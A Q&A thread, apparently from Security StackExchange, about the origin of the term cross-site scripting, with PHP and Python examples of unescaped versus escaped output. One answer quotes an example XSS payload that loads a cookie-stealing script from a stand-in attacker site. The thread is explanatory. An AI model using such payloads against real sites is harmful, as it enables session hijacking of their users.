Why is Cross-site scripting called Cross-site scripting? The term implies to me (a non-native English speaker) that there is some other web site involved that attacks your web site, but most of the time this is not the case, is it? (Hell, it doesn't always even include scripting (feeding JavaScript to the user) either. A faked HTML interface is often a viable execution strategy too.)

As I understand it, that which we call XSS is caused by an insufficient escaping of user input and primarily happens in web applications, as shown in this question. For example, the following piece of code is vulnerable:

<?php
echo $_GET['q'];
?>

But the following fixes it[1]:

<?php
echo htmlspecialchars($_GET['q']);
?>

The user input can be stored in the database too, and the same thing happens if the input is not escaped when it is brought back for display. And in fact, this seems to be the method of attack that is the most beneficial for the attacker (affects the most users) and thus the most used.

I feel that the nebulousness of the term leads to hack jobs such as removing offending characters or strings from user input and other confusion (apparently allowing valid JavaScript in the database is wrong) when inexperienced people are trying to patch for it.

Instead of the abstruse term XSS, wouldn't something like lack of escaping work just as well, and be much clearer? Or is there something more that the term XSS encompasses?

[1]: Assuming we are in the middle of a HTML page, of course.

oals

  • Wiki explains the meaning of the original term: https://en.wikipedia.org/wiki/Cross-site_scripting#Background – schroeder Sep 01 '16 at 21:40

2 Answers

15

From the link schroeder gave in the comment the origin of the "Cross" in XSS becomes apparent: the first XSS was because Alex goes to evilsite.com and sees a link saying: 'see cute puppies on nicesite.com?q=puppies&<script src="evilsite.com/steal_auth_cookie.js"></script>'. Clicking on the link on evilsite.com results in a redirection to nicesite.com. The combination of nicesite.com failing to escape the query parameter puppies&<script src="evilsite.com/steal_auth_cookie.js"></script> before writing it to the page produces the cross-site attack by loading the evilsite.com script. (Example simplified from the Wikipedia article.) This attack (known specifically as a reflected and non-persistent XSS) is cross-site because it came from and required evil.com, as opposed to only requiring a vulnerability in nicesite.com.

(Edit: As pointed out in the comments the link can also come from an email or a different site. So you could also go to othersite.com and click the link pointing to nicesite.com with the XSS payload for evilsite.com.)

Microsoft security-engineers introduced the term "cross-site scripting" in January 2000. The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack-site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (taking advantage of a reflected or non-persistent XSS vulnerability).

It goes on to explain that the XSS term has broadened to now include things that don't involve a cross site.

The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including ActiveX, Java, VBScript, Flash, or even HTML scripts), causing some confusion to newcomers to the field of information security.

Regarding a different, more descriptive and less confusing name: from my research it seems you are correct in stating this is a class of vulnerabilities from not escaping user content. Naming is hard, so it's unlikely to change. The only one I could think up briefly was Unescaped Scripting Attack, but the acronym USA is already taken!

By the way this is an excellent question and one I pondered myself.

AJP

  • I also think this technique only requires a vulnerability in nicesite.com, who should bear the sole responsibility of properly escaping search parameters in the URL. On the other hand, irrelevant.com should not forbid links even if the URL is very weird. It could alert the user, though. – wlnirvana Feb 20 '20 at 06:23
  • Thanks @wlnirvana I've made an edit. – AJP Feb 20 '20 at 21:13
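As an added example (not code from the question or this answer), a Python stand-in for nicesite.com's search page: it builds the crafted link from the answer's payload, reads "q" back the way $_GET would, and renders it both unescaped (the question's echo $_GET['q']) and escaped (htmlspecialchars, approximated here with html.escape). The /search path, the page template and the reflects_script check are assumptions made for the demonstration.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed payload, copied from the answer's simplified link. In a real
# crafted link it is percent-encoded so the '&' stays inside "q";
# urlencode does that here.
PAYLOAD = 'puppies&<script src="evilsite.com/steal_auth_cookie.js"></script>'
CRAFTED_URL = "https://nicesite.com/search?" + urlencode({"q": PAYLOAD})

# Hypothetical page template standing in for nicesite.com's search results.
TEMPLATE = "<html><body><h1>Results for: {q}</h1></body></html>"


def query_param(url: str, name: str = "q") -> str:
    """Return one query parameter the way $_GET[name] would (first value)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_vulnerable(q: str) -> str:
    """Equivalent of `echo $_GET['q'];`: raw input lands in the HTML body."""
    return TEMPLATE.format(q=q)


def render_fixed(q: str) -> str:
    """Equivalent of `echo htmlspecialchars($_GET['q']);` for HTML body
    context. html.escape(quote=True) also encodes both quote characters,
    like htmlspecialchars with ENT_QUOTES."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


SCRIPT_START = re.compile(r"<script\b", re.IGNORECASE)


def reflects_script(page: str) -> bool:
    """Coarse check for a live <script> start tag in the rendered output.
    '&lt;script' is inert text and does not match."""
    return SCRIPT_START.search(page) is not None


if __name__ == "__main__":
    q = query_param(CRAFTED_URL)
    for label, page in (("vulnerable", render_vulnerable(q)),
                        ("fixed", render_fixed(q))):
        print(f"{label}: script reflected = {reflects_script(page)}")
        print("   ", page)
```

The same output-time escaping is what protects the stored variant the question mentions: the database may hold the raw string, as long as it is escaped for the context it is written into.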
7

The site in cross-site scripting relates to a site (host, machine, client-side, server-side, location, environment and such) not to website. This may cause the confusion. In addition, the X (cross) was chosen instead of the C to distinguish between the styling language and this type of attack.

Yorick de Wid

  • While it does help prevent confusion between XSS and CSS I don't think that is the reason for the X. In the United States and other native English speaking areas 'X' is a common substitution for the abbreviation of crossing. On signs and road ways they even use the term 'Xing'. https://en.wikipedia.org/wiki/X#English – Bacon Brad Sep 01 '16 at 22:54
  • @baconface it could very well be so, I've never checked that. Ty – Yorick de Wid Sep 01 '16 at 23:28
  • I think the main concern of the OP is why this exploit is called cross-site scripting, not why cross-site scripting is acronymed as XSS. – wlnirvana Feb 20 '20 at 05:20